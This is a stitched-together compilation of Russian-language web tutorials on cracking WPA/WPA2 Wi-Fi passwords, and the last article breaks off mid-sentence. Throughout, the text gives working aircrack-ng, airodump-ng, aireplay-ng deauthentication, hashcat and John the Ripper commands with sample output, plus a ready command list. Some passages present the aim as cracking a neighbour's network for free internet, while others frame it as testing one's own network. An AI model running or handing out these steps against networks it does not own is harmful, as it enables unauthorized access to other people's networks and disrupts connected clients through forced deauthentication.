Если вы знакомы с процессом, можете пропустить описания и сразу перейти к списку команд в конце. Разнообразные предложения и альтернативные методы перечислены в приложении.

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Данное ПО/руководство предназначено только для образовательных целей. Его нельзя использовать для нелегальной активности.

Автор не несёт ответственности за его использование. Не будь уродом.

Для начала

Это руководство предполагает, что вы:

  • В целом не испытываете проблем с использованием командной строки.
  • Работаете в дистрибутиве Linux на базе Debian, желательно Kali linux (пользователям OS X см. приложение).
  • У вас установлен Aircrack-ng
    • sudo apt-get install aircrack-ng
  • Ваша карта беспроводной связи поддерживает режим монитора (см. список совместимых устройств).

Взлом сети Wi-Fi

Начнём со списка беспроводных интерфейсов, которые поддерживают режим монитора:

airmon-ng

Если вы не видите интерфейсов в списке, то ваша карта не поддерживает режим монитора. Предположим, что название вашего интерфейса wlan0, но используйте настоящее название, если оно отличается от этого. Далее, переведём интерфейс в режим монитора:

airmon-ng start wlan0

Запускаем iwconfig. Теперь вы должны увидеть новый интерфейс монитора (скорее всего, mon0 или wlan0mon).

Найти цель

Начните прослушивать трансляцию кадров неисправности окружающих беспроводных маршрутизаторов, используя свой интерфейс монитора:

airodump-ng mon0

Вы должны увидеть примерно такую выдачу. CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests 14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8 14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP 14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro 9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme 00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome 06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK Hh3 78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2 9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca

Захват 4-стороннего рукопожатия

WPA/WPA2 использует 4-стороннее рукопожатие для аутентификации устройств в сети. Неважно, что это значит, но вам нужно захватить одно из этих рукопожатий, чтобы взломать сетевой пароль. Эти рукопожатия происходят каждый раз, когда устройства подключаются к сети, например, когда ваш сосед возвращается домой с работы.

Читайте также  Программа для зарядки айпада от компьютера

Чтобы перехватить рукопожатие, мы направляем airmon-ng для мониторинга трафика в целевой сети, используя значения канала и bssid, полученные предыдущей командой.

# replace -c and —bssid values with the values of your target network # -w specifies the directory where we will save the packet capture

airodump-ng -c 3 —bssid 9C:5C:8E:C9:AB:C0 -w . mon0

CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS Теперь мы ждём… Как только будет захвачено рукопожатие, вы должны увидеть в правом верхнем углу экрана, рядом с текущим временем что-то вроде [ WPA handshake: bc:d3:c9:ef:d2:67. Если не терпится и вы согласны на активную атаку, то можете заставить устройства в сети заново соединиться, принудительно разъединив их. Для этого им нужно отправить вредоносные пакеты на деаутентификацию. Это часто приводит к перехвату 4-стороннего рукопожатия. См. раздел об атаке с деаутентификацией ниже.

Как только вы перехватили рукопожатие, нажмите ctrl-c для выхода из airodump-ng. Вы увидите файл .cap там, где указали airodump-ng сохранять перехваты (скорее всего, он называется -01.cap). Мы используем этот файл перехвата для взлома сетевого пароля. Я люблю менять название файла в соответствии с названием сети, которую мы будем взламывать:

mv ./-01.cap hackme.cap

Взлом пароля сети

Последний шаг — это взломать пароль, используя перехваченное рукопожатие. Если у вас есть доступ к GPU, настоятельно рекомендую использовать для взлома пароля hashcat. Я создал простой инструмент, с помощью которого использовать hashcat очень легко: он называется naive-hashcat.

Если у вас нет доступа к GPU, то можно воспользоваться различными онлайновыми GPU-сервисами для взлома, вроде GPUHASH.me или OnlineHashCrack. Можете также попробовать использовать CPU-брутфорс с помощью Aircrack-ng.

Обратите внимание, что оба метода атаки ниже предполагают относительно простой пользовательский пароль. Большинство маршрутизаторов WPA/WPA2 поставляются с сильными 12-значными случайными паролями, которые большинство пользователей оставляют без изменений (и правильно делают).

Если пробуете взломать один из таких паролей, рекомендую использовать словарные файлы Probable-Wordlists WPA-length.

Взлом с помощью naive-hashcat (рекомендуемый метод)

До того, как начать взлом пароля с помощью naive-hashcat, нужно конвертировать наш файл .cap в эквивалентный hashcat формат для .hccapx. Это легко сделать или загрузив файл .cap на https://hashcat.net/cap2hccapx/, или напрямую используя инструмент cap2hccapx.

cap2hccapx.bin hackme.cap hackme.hccapx

Затем скачиваем и запускаем naive-hashcat:

# download git clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat # download the 134MB rockyou dictionary file curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt # crack ! baby ! crack ! # 2500 is the hashcat hash mode for WPA/WPA2

HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Naive-hashcat использует различные словари, правила, комбинации и маски (умный брутфорс) для проведения атаки. Атака на пароль средней сложности может занять дни или даже месяцы. Взломанный пароль будет сохранён в hackme.pot, так что периодически проверяйте этот файл. Как только пароль взломан, то в POT_FILE вы увидите что-то такое:

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

Где последние два поля, разделённые : представляют собой имя сети и пароль, соответственно.

Если предпочитаете использовать hashcat без naive-hashcat, то см. эту страницу.

Взлом с Aircrack-ng

Aircrack-ng можно использовать для самых простых словарных атак силами CPU. Перед началом атаки нужно получить список слов. Рекомендую использовать известный словарный файл rockyou:

# download the 134MB rockyou dictionary file curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Обратите внимание, что если сетевой пароль отсутствует среди слов в файле, то вы его не взломаете.

# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap

Как только пароль взломан, вы увидите в окне терминала сообщение KEY FOUND!, после которого будет указан пароль в текстовом виде.

Aircrack-ng 1.2 beta3 [00:01:49] 111040 keys tested (1017.96 k/s) KEY FOUND! [ hacktheplanet ] Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Атака с деаутентификацией

Атака с деаутентификацией предполагает отправку поддельных пакетов на деаутентификацию с вашей машины клиенту, подключенному к сети, которую вы пытаетесь взломать. Эти пакеты включают в себя поддельные адреса «sender», так что клиент думает, что они отправлены с настоящих точек доступа.

Получив такой пакет, большинство клиентов отключаются от сети и немедленно переподключаются, обеспечивая вам возможность участвовать в 4-стороннем рукопожатии, если вы мониторите с помощью airodump-ng.

Используйте airodump-ng для мониторинга конкретной точки доступа (используя -c channel —bssid MAC) до тех пор, пока клиент (STATION) не подключится.

Подключенный клиент выглядит примерно так, где 64:BC:0C:48:97:F7 его MAC-адрес:

CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS BSSID STATION PWR Rate Lost Frames Probe 9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS Теперь оставим airodump-ng работать, а сами откроем новое окно консоли. Мы используем команду aireplay-ng для отправки пакета на деаутентификацию жертве, заставляя его переподключиться к сети, и будем надеяться на рукопожатие.

# -0 2 specifies we would to send 2 deauth packets. Increase this number # if need be with the risk of noticeably interrupting client network activity # -a is the MAC of the access point # -c is the MAC of the client

aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

Как вариант, вы можете транслировать пакеты деаутентификации всем клиентам вокруг:

# not all clients respect broadcast deauths though aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0

Как только вы отправили пакеты, возвращайтесь к процессу airodump-ng, и при удачном стечении обстоятельств увидите справа вверху: [ WPA handshake: 9C:5C:8E:C9:AB:C0. Теперь вы перехватили рукопожатие и можно начинать взлом пароля сети.

Список команд

Ниже список всех команд, которые нужны для взлома сети WPA/WPA2, по порядку, с минимальным описанием.

# put your network device into monitor mode airmon-ng start wlan0 # listen for all nearby beacon frames to get target BSSID and channel airodump-ng mon0 # start listening for the handshake airodump-ng -c 6 —bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0 # optionally deauth a connected client to force a handshake aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 ########## crack password with aircrack-ng… ########## # download 134MB rockyou.txt dictionary file if needed curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt # crack w/ aircrack-ng aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap ########## or crack password with naive-hashcat ########## # convert cap to hccapx cap2hccapx.bin capture/-01.cap capture/-01.hccapx # crack with naive-hashcat

HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Приложение

Отзывы на это руководство были такими замечательными, что я добавил советы и дополнительные материалы от участников сообщества в дополнительное приложение.

Изучите его, чтобы узнать, как:

  • Перехватывать рукопожатия и взламывать пароли WPA на MacOS/OSX
  • Перехватывать рукопожатия со всех сетей вокруг с помощью wlandump-ng
  • Использовать crunch для генерации на лету словарных списков на 100 ГБ и больше
  • Подделывать свой MAC-адрес с помощью macchanger

Авторство

Основная часть информации здесь почерпнута из великолепного руководства Льюиса Энкарнасьона. Спасибо также авторам и мейнтейнерам Aircrack-ng и Hashcat.

Огромная благодарность neal1991 за перевод этого руководства на китайский.

Кроме того, благодарим hiteshnayak305, enilfodne, DrinkMoreCodeMore, hivie7510, cprogrammer1994, 0XE4, hartzell, zeeshanu, flennic, bhusang, tversteeg, gpetrousov, crowchirp и Shark0der с Reddit и GitHub, которые тоже помогли советами и исправлением опечаток.

Если вам интересно узнать о дополнительных вариантах взлома WPA2, почитайте это обсуждение на Hacker News.

  • деаутентификация
  • Airodump-ng
  • Aircrack-ng
  • Hashcat
  • WPA
  • WPA2
  • cap2hccapx
  • 5 августа 2012 в 17:38
  • 14 сентября 2011 в 11:19
  • 23 июня 2011 в 23:29

Источник: https://habr.com/post/334966/

Как пользоваться Aircrack-NG

В этой статье я расскажу о программе – Aircrack-NG, опишу её функционал и возможности, а также поясню, как пользоваться Aircrack-NG. Интернет уже давно стал привычным атрибутом нашей жизни. Через интернет мы общаемся, узнаём новости, смотрим фильмы и слушаем музыку, учимся, зарабатываем деньги и многое другое.

При этом далеко не всегда Интернет может оказаться под рукой и в свободном доступе, и довольно часто при поиске свободной Wi-Fi сети нас встречают десятки закрытых и запароленных альтернатив.

Ничего страшного! Существуют программы, которые при должном умении (а главное – терпении) позволяют вскрыть пароль к чужой точке доступа и наслаждаться интернетом с неё абсолютно бесплатно.

Логотип программы Aircrack

Что такое Aircrack-NG

Aircrack-NG — это набор сетевых программ, предназначенных для обнаружения, анализа, перехвата и взлома беспроводных сетей и соответствующего сетевого трафика.

С помощью инструментария, представленного в данном пакете, можно взламывать протоколы безопасности WEP и WPA/WPA2-PSK, тестировать беспроводные сети на уязвимость к внешним атакам (penetration test), проводить проверку стойкости сети и так далее.

Программа работает с большинством популярных ОС (Виндовс, Юникс, Линукс, Мак ОС), обладая также версией для мобильных платформ (Android, Symbian, iOS).

Указанный продукт представлен в двух основных вариантах:

  • Консольном (для более опытных пользователей и специалистов);
  • Графическом (GUI) – удобный графический формат;

При этом работа даже с более простым GUI-вариантом предполагает предварительную подготовку пользователя.

Необходимо разобраться с понятийным аппаратом, уяснить специфику алгоритмов шифрования WEP, WPA и WPA2, ознакомиться с вспомогательными программами, которые помогут нам во взломе (к примеру, с комплементарным приложением CommView) и так далее. В статье я расскажу об использовании расшифровщика перехваченного трафика Aircrack-NG.

Взлом WIFI c Aircrack-NG

Знакомимся с интерфейсом Aircrack-NG

Итак, для того чтобы установить Aircrack-NG. Скачайте данную программу с официального ресурса, сохраните архив на жёсткий диск, распакуйте его. Для запуска 32-битной версии архива (под 32-битную ОС) перейдите в распакованный архив по адресу Папка архива\bin\32-bit\ и запустите там файл Aircrack-ng GUI.exe.

Вам откроется окно программы с пятью основными вкладками:

  • Вкладка «Aircrack-ng» позволяет взламывать ключи WEP и WPA путём перебора паролей в файле-словаре;
  • Вкладка «Airodump-ng» являет собой анализатор трафика, может помещать трафик в файлы IVS или PCAP, показывает информацию о сетях;
  • Вкладка «Airdecap-ng» поможет в расшифровке перехваченного трафика при заранее известном ключе;
  • Вкладка «WZCook» поможет в восстановлении ключей WEP, отображает PMK (Pairwise Master Key) и так далее.
  • Вкладка «About» расскажет нам о текущей версии приложения и специфике улучшений программы.Интерфейс взломщика вай-фай
Читайте также  Asus instant on что это за программа

Как взломать пароль к Wi-Fi с помощью Aircrack-NG

Разберём на простом примере алгоритм взлома пароля соседской вай-фай сети, которая зашифрована протоколом WPA (ныне наиболее популярен) используя Aircrack-NG. Для этого выполните следующее:

  1. Запустите программу, перейдите в первую вкладку «Aircrack-ng»;
  2. В строке «Filenames» указываем путь к файлу дампа с перехваченными пакетами (данный файл можно получить, использовав, к примеру, программу «CommView for WiFi»);
  3. В «Encryption» (шифрование) выбираем «WPA»;
  4. В строке «Wordlist» указываем путь к файлу, содержащему огромную базу вариантов паролей (его можно поискать в сети);
  5. Ставим галочку в «Advanced option» (Дополнительные опции);
  6. Ставим галочку в «Specify ESSID» и указываем там имя взламываемой нами Wi-Fi сети;
  7. Теперь ставим галочку в «Specify BSSID», и в открывшейся строке указываем MAC-адрес сети (с ним поможет та же «CommView for WiFi», во вкладке «Узлы» которой необходимо кликнуть правой клавишей мыши на нужной нам сети и выбрать в появившемся меню «Копировать MAC-адрес»);
  8. Затем кликаем на кнопку «Launch» (запуск) внизу и ждём нахождения правильного пароля. В зависимости от сложности пароля время поиска может занять от нескольких минут до 5-10 часов (а то и более).

Надеюсь вы поняли как пользоваться Aircrack-ng и вы сумели взломать точку доступа.

инструкция использования программы Aircrack-ng

Как получить cab файл:

Во время процесса использования Aircrack-NG обратите внимание, что полноценное использование указанного продукта, который, de facto, работает на принципах брутфорса, невозможно без дополняющих его функционал сторонних программ (уровня «CommView for WiFi»). Удачный же взлом паролей к сторонним Wi-Fi сетей требует регулярных практических упражнений, позволяющих развивать и совершенствовать свои знания, умения и навыки в выбранном деле (в данном случае, хакинге). Дорогу, как известно, осилит лишь идущий.

Как вы оцените статью? (11 2,73 из 5) Загрузка…

Источник: https://RusAdmin.biz/zashhita-i-bezopasnost/kak-polzovatsya-aircrack-ng/

Как пользоваться aircrack-ng. WPA и WPA2

В наши дни беспроводные сети используются все чаще и чаще, уже в каждом доме где есть интернет, есть и роутер для раздачи Wifi на мобильные устройства и другие гаджеты. Интернет и Wifi стали неотъемлемой частью нашей жизни.

Но остался вопрос о безопасности таких сетей.

Как показывает история люди всегда находили способы взломать сети, и прекрасное тому подтверждение — протокол WEP, который поддавался взлому буквально за несколько минут, даже при отсутствии подключенных к сети пользователей.

Но, похоже, достучались, люди все реже используют WEP и защищают свои сети с помощью более современных стандартов таких как WPA и WPA2. Но действительно ли они безоговорочно безопасны? В этой статье мы рассмотрим как пользоваться утилитой Aircrack-ng для тестирования безопасности сетей WPA и WPA2. Вы увидите в чем их слабое место и узнаете как защитить себя от взлома.

Что такое Aircrack-ng?

Aircrack-ng — это набор утилит для тестирования безопасности Wifi сетей. Он был разработан группой специалистов с информационной безопасности и в него входят несколько утилит для сканирования сети, передачи пакетов в сеть, настройки интерфейса и непосредственно, перебора пароля. Программы поддерживают взлом WPA, так и WEP сетей.

В пакет Aircrak входит большое количество утилит, но мы рассмотрим только самые основные:

  • airodump-ng — сканирование сети и захват пакетов которые были отправлены в эфир;
  • airmon-ng — переключение сетевого интерфейса в режим мониторинга для приема всех пакетов, которые есть в сети;
  • wesside-ng — утилита для автоматического взлома WEP использует атаку типа PTW;
  • easside-ng — утилита для автоматического взлома WEP с помощью перебора ключа на основе векторов инициализации;
  • besside-ng — автоматический взлом сетей WEP и перехват handshake для WPA;
  • airolib-ng — утилита для управления списком точек доступа и паролей;
  • airbase-ng — универсальная утилита для выполнения различных атак на сети Wifi, находится в разработке;
  • tkiptun-ng — утилита для взлома WPA TKIP;
  • airdecap-ng — утилита для расшифровки перехваченного трафика, работает только при наличии ключа;
  • airdrop-ng  — выполняет деаутентификацию пользователей;
  • aireplay-ng — позволяет генерировать трафик внутри Wifi сети.

В этой статье мы будем использовать только некоторые из этих утилит. А именно airodump, airmon, aircrhack и besside для попытки автоматического взлома.

Как будет работать атака на WPA/WPA2?

Как я уже говорил протокол шифрования беспроводных сетей WPA тоже имеет свои недочеты. Но большинство из них усугубляет именно пользователь. Если не учитывать недавно открытую уязвимость в работе WPA TKIP, то все остальные проблемы возникают из-за слабого пароля.

Для нашей тестовой атаки будем использовать собственную сеть. Предполагается, что вы к ней не подключены. Рассмотрим в чем состоит суть атаки. Для того чтобы подключиться к сети каждый клиент должен пройти процесс аутентификации с роутером.

Я не буду вдаваться в подробности, но между клиентом и маршрутизатором выполняются четыре проверки подлинности на основе MAC адреса, ключа и случайных чисел, если мы их перехватим, то сможем уже на локальном компьютере попробовать перебрать подходящий пароль уже на локальном компьютере.

Суть метода в том, что скорость перебора на компьютере будет намного быстрее, чем при ручной проверке, она будет достигать до 1000 паролей в секунду, а при использовании очень простого и ожидаемого пароля, его можно очень быстро перебрать.

Сначала мы переведем устройство в режим монитора с помощью airmon-ng, затем будем перехватывать все пакеты от этой сети с помощью airodump-ng пока не найдем рукопожатие, затем останется перебрать пароль по словарю с помощью aircrack. А теперь перейдем ближе к практике и рассмотрим насколько просто перебрать ваш пароль если он достаточно простой.

Как пользоваться Aircrack-ng для взлома WPA

Дальше рассмотрим как пользоваться aircrack-ng. Если программа еще не установлена на вашем компьютере, то в Linux вы можете скачать ее из официальных репозиториев. В Ubuntu:

sudo apt install aircrack-ng

А в Red Hat / CentOS:

sudo yum install aircrack-ng

Windows вам придется загрузить установщик из официального сайта. После установки первым делом нужно сделать чтобы нам ничего не мешало. Для этого отключите все сервисы, которые управляют Wifi и тем более отключитесь от Wifi сети, если вы к ней подключены. Если запущен NetworkManager, его нужно отключить:

sudo systemctl stop NetworkManager

Я предполагаю, что у вас уже установлены все необходимые драйвера и вы готовы к работе. Сначала смотрим подключенные к системе интерфейсы:

sudo ls /sys/class/net/

В этом режиме он может захватывать все пакеты, которые летают в сети и даже если ему они не адресованы ему.

Вообще, интерфейс и так захватывает все пакеты, но на программном уровне все пакеты, которые не адресованы этому компьютеру отсеиваются, теперь они не будут отсеиваться. Дальше идет инструкция Aircrack-ng.

Для этого воспользуемся утилитой airmon-ng. Ей нужно передать команду start и имя интерфейса:

sudo airmon-ng start wlp0s0b1

После этого будет создан виртуальный интерфейс, который работает в режиме монитора во второй колонке отображено его имя, у меня это wlp3s0b1mon, хотя часто он называется просто mon0. Если какие-либо программы будут мешать программа выдаст их имена и PID:

Их нужно завершить с помощью kill. Дальше нам нужно просканировать эфир и найти нашу сеть, которую мы собираемся тестировать. Для этого используйте команду airodump-ng. В параметрах ей нужно передать только интерфейс. Обратите внимание, что нужно передавать именно виртуальный интерфейс, который работает в режиме монитора:

sudo airodump-ng -i wlp3s0b1mon

Почти сразу же вы увидите свою сеть, поскольку она расположена ближе всех. У меня это MyPublicWifi423. Из предоставляемой информации нам понадобится ее BSSID и канал, который можно найти в колонке CH. Дальше мы будем использовать ту же самую утилиту, только теперь нацелим ее именно на нашу сеть, чтобы она не отвлекалась на посторонние и поймала все что нам нужно.

Мы зададим канал с помощью опции -с и BSSID роутера с помощью опции —bssid, а также укажем с помощью опции -w куда нужно сохранить перехваченные пакеты для дальнейшей обработки:

sudo airodump-ng -c 11 —bssid 56:0A:64:17:5D:33 -w /home/sergiy/hack.pcap wlp3s0b1mon

Не закрывайте этот терминал, сейчас выполняется захват и как вы можете видеть к нашей сети подключено два пользователя. Их MAC адреса находятся в колонке STATION. Если сейчас один из них отключится и еще раз подключится, то мы получим необходимые для дальнейшего взлома данные.

Мы можем это сделать со своими устройствами, но в реальной сети у хакера не будет такой возможности, поэтому мы можем принудительно отключить клиента от сети с помощью утилиты aireplay.

Если передать ей опцию deauth, то она разошлет широковещательное сообщение от имени маршрутизатора, в котором попросит всех отключиться от сети.

Нам нужно только передать в параметрах количество пакетов, которые нужно отправить и BSSID роутера:

sudo aireplay-ng —deauth 10 -a 56:0A:64:17:5D:33 wlp3s0b1mon

Сразу после этого вы сразу же увидите, сообщение WPA handshake: 56:0A:64:17:5D:33 в правом верхнем углу терминала. Вы можете использовать и более простой способ для получения Handshake. Утилита besside позволяет выполнить все действия автоматически нужно только передать BSSID роутера и интерфейс монитора:

sudo besside-ng -b 02:C2:C6:46:39:85 wlp3s0b1mon

Этап, связанный с работой в реальной сети завершен и нам осталось только перебрать все возможные пароли по словарю. Дальше рассмотрим как пользоваться Aircrack-ng для перебора паролей.

Словарь — это обычный текстовый документ со списком возможных паролей. Вы можете составить его сами. Команда будет выглядеть следующим образом:

$ sudo aircrack-ng -b BSSID_маршрутизатора -w путь_к_словарю перехваченные_пакеты

sudo aircrack-ng —bssid 56:0A:64:17:5D:33 -w /home/sergiy/words /home/sergiy/hack.pcap-01.cap

Дальше начнется перебор ключей и если ключ, который использовался для защиты сети есть в списке, то он обязательно будет найден:

Как видите, aircrack-ng wpa2 psk достаточно быстро может быть взломан. Скорость перебора паролей достигает тысячи вариантов в секунду, а это значит, что на перебор до 100000 паролей уйдет всего только несколько минут. И это на обычном, бюджетном ноутбуке. На более мощном железе использовать Aircrack-ng будет намного быстрее.

Поэтому никогда не используйте простые пароли, состоящие только из цифр, если вы добавите хоть одну букву или символ, то уменьшите шансы на взлом в несколько раз.

Источник: https://ualinux.com/ru/stream/kak-polzovatsya-aircrack-ng-wpa-i-wpa2

Взлом Wi-Fi сетей, Aircrack-ng, Kali Linux.

В этой статье мы познакомимся с популярными методами взлома Wi-Fi сетей. Надеюсь после прочтения, вы сделает более безопасной свою сеть. Как говориться : предупрежден значит вооружен )

WPA/WPA2.

WPA и WPA2 (Wi-Fi Protected Access) собственно это протокол авторизации и шифрования данных в Wi-Fi сетях. На данный момент это самый популярный,  самый надежный протокол. Часто в домашних условиях и маленьких сетях используют   WPA2-PSK(Pre-Shared Key). В начале 2018 года международный альянс Wi-Fi Alliance анонсировал новейший протокол беспроводной безопасности — WPA3.

Основной и самый популярный метод атаки на этот протокол является брутфорс(метод грубой силы, перебор паролей).

handshake.

Для того, чтобы устройство получило маркер доступа в сеть, на устройстве необходимо ввести специальную парольную фразу, называемую Pre-Shared Key. Длина должна быть от 8 до 32 символов, притом можно использовать специальные символы, а также символы национальных алфавитов. После ввода парольной фразы она помещается в специальный пакет ассоциации (пакет обмена ключами, handshake), который передается на точку доступа. Если парольная фраза верна, то устройству выдается маркер доступа в сеть.

Уязвимостью является возможность перехвата пакетов handshake, в которых передается Pre-Shared Key при подключении устройства к сети. По сколько Pre-Shared key шифруется, у злоумышленника остается только одна возможность – атака грубой силой на захваченные ассоционные пакеты.   Также стоит обратить внимание, что для того, чтобы перехватить handshake злоумышленнику совсем не обязательно ждать того момента, как к сети будет подключено новое устройство. На некоторых беспроводных адаптерах, при использовании нестандартных драйверов, есть возможность посылки в сеть реассоционных пакетов, которые будут прерывать сетевые соединения и инициировать новый обмен ключами в сети между клиентами и точкой доступа. В таком случае, для того, чтобы захватить требуемые пакеты, необходимо, чтобы к сети был подключен хотя бы один клиент.

Взлом.

В наших примеров я использую  Kali Linux (Kali Linux — GNU/Linux-LiveCD, возникший как результат слияния WHAX и Auditor Security Collection. Проект создали Мати Ахарони (Mati Aharoni) и Макс Мозер (Max Moser). Предназначен прежде всего для проведения тестов на безопасность). И покет уже установленных программ Airocrack-ng (Это полный набор инструментов для оценки безопасности сети Wi-Fi.)

Первым этапом нам надо перевести наш Wi-Fi адаптер в режим мониторинга. То есть чип адаптера переводиться в режим прослушивания эфира. Все пакеты которые отсылают друг другу в округе.

Сначала мы убьем все процессы которые используют Wi-Fi интерфейс:

airmon-ng check kill

Запустите беспроводной интерфейс в режиме мониторинга:

airmon-ng start wlan0

В результате у вас появиться новый интерфейс wlan0mon с ним дальше мы и будем работать (посмотреть доступные интерфейсы можно командой ifconfig ). Теперь мы можем посмотреть что же происходит вокруг:

airodump-ng wlan0mon

  • BSSID — MAC адрес WI-Fi точки.
  • PWR — Сила сигнала.
  • Beacons — Фрейм Бикон (Beacon frame) /Точка доступа WiFi периодически отправляет Биконы для анонсирования своего присутствия и предоставления необходимой информации (SSID, частотный канал, временные маркеры для синхронизации устройств по времени, поддерживаемые скорости, возможности обеспечения QoS и т.п.) всем устройствам в зоне ее покрытия. Радиокарты пользовательских устройств периодически сканируют все каналы 802.11 и слушают биконы, как основу для выбора лучшей точки доступа для ассоциации. Пользовательские устройства обычно не посылают биконы, за исключением ситуации, когда выполняется процедура участия в IBSS (Independent Basic Service Set) или, по другому, в одноранговом соединении типа Ad-hoc.
  • CH — Номер канала точки доступа.
  • ENC- Используемый алгоритм. OPN = нет шифрования, «WEP?» = WEP или выше (недостаточно данных для выбора между WEP и WPA/WPA2), WEP (без знака вопроса) показывает статичный или динамичный WEP, и WPA или WPA2 если представлены TKIP или CCMP или MGT.
  • CIPHER — Обнаруженный шифр. Один из CCMP, WRAP, TKIP, WEP, WEP40, или WEP104. Не обязательно, но обычно TKIP используется с WPA, а CCMP обычно используется с WPA2. WEP40 показывается когда индекс ключа больше 0. Стандартные состояния: индекс может быть 0-3 для 40 бит и должен быть 0 для 104 бит.
  • AUTH —Используемый протокол аутентификации. Один из MGT (WPA/WPA2 используя отдельный сервер аутентификации), SKA (общий ключ для WEP), PSK (предварительно согласованный ключ для WPA/WPA2) или OPN (открытый для WEP).
  • ESSID — Так называемый SSID, который может быть пустым, если активировано сокрытие SSID. В этом случае airodump-ng попробует восстановить SSID из зондирующих запросов ассоциирования.
  • STATION —MAC адрес каждой ассоциированной клиента подключенного к точке доступа. Клиенты, в настоящий момент не ассоциированные с точкой доступа, имеют BSSID «(not associated)».
Можете немного поиграться : airodump-ng —manufacturer —uptime —wps wlan0mon

Запускаем airodump-ng для беспроводного интерфейса wlan0mon, кроме основной информации мы задаём отображать производителя (—manufacturer), время работы (—uptime) и информацию о WPS (—wps).

Теперь нам надо перехватить  handshake какой либо точки доступа, желательно конечно к которой подключены клиенты ). airodump-ng -c 1 —bssid C0:4A:00:F0:F4:24  -w WPA wlan0mon

-c  номер канал.

—bssid мас адрес точки доступа

-w файл в который будут сохранены все перехваченные пакты.

wlan0mon Название беспроводного интерфейса интерфейса.

После удачного захвата рукопожатий в правом углу будет надпись WPA handshake

К стати мы можем попытаться ускорить процесс , заставив клиента переподключиться к точки доступа :

aireplay-ng —deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon

—deauth  — отправка запроса  деаунтифицировать. (0 не ограниченное число пакетов)

-a  — Мас адрес точки доступа.

-с — Мас адрес клиента.

wlan0mon — интерфейс.

Другие виды атак :

       --fakeauth    задержка : фальшивая аутентификация с ТД (-1)       --interactive       : интерактивный выбор фреймов (-2)       --arpreplay         : стандартная повторная отправка запросов ARP (-3)       --chopchop          : расшифровать/порубить WEP пакет (-4)       --fragment          : сгенерировать валидный поток ключей   (-5)       --caffe-latte       : запросить клиента на новые IVs  (-6)       --cfrag             : фрагментирование в отношении клиента  (-7)       --migmode           : атаки режим миграции WPA  (-8)       --test              : тест возможности инжекта и качества соединения (-9).

Теперь нам надо расшифровать его и узнать PSK:

aircrack-ng -w wordlist.dic -b C0:4A:00:F0:F4:24  WPA.cap

-w  — Указываем словарь для перебора паролей.

-b   — Мас адрес точки доступа.

WPA.cap — Файл с  handshake.

aircrack-ng всем хорош, но у него нету функции паузы и запоминания места где вы остановились. Это очень не удобно когда у вас огромный словарь )  Мы это справим  программой  John The Ripper (свободная программа, предназначенная для восстановления паролей по их хешам. Основное назначение программы — аудит слабых паролей в UNIX системах путем перебора возможных вариантов.Она уже есть в дистрибутиве). 

john —session=foo —stdout —wordlist=wordlist.dic | aircrack-ng -w — -b 00:11:22:33:44:55 WPA.cap

То есть мы будем брать пароли из словаря этой программной и направлять их в aircrack-ng.

—session — Имя сессии.

— stdout — Путь к словарю.

Для паузы нам надо нажать q или ctrl+c. Программа создаст специальный файл с сессией и запомнит место где мы остановились. Продолжить сессию мы можем командой :

